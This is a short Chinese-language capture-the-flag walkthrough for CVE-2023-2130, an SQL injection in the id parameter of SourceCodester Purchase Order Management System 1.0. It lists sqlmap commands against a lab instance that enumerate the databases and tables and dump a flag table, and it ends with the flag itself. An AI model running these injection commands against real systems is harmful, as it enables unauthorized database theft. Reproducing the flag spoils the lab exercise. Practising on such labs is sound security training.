【春秋云境】CVE-2023-2130靶场Purchase Order Management System攻略
靶标介绍
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
靶场首页
Purchase Order Management System

操作步骤
根据靶标介绍得知,/admin/suppliers/view_details.php文件中的id参数存在SQL注入
1、访问受影响文件
https://eci-2ze2wznzc7oprnchl6p4.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php

2、拼接参数
https://eci-2ze2wznzc7oprnchl6p4.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1

页面有回显。
3、sqlmap扫描
python sqlmap.py -u "https://eci-2ze2wznzc7oprnchl6p4.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --batch

4、找到flag
1、列出数据库
python sqlmap.py -u "https://eci-2ze2wznzc7oprnchl6p4.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --batch --dbs

2、列出purchase_order_db库里的表
python sqlmap.py -u "https://eci-2ze2wznzc7oprnchl6p4.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --batch -D purchase_order_db --tables

3、列出表fllllaaaag全部数据
python sqlmap.py -u "https://eci-2ze2wznzc7oprnchl6p4.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --batch -D purchase_order_db -T fllllaaaag --dump

flag{f687cc9f-5d39-4c27-aa03-d76b9a086eba}







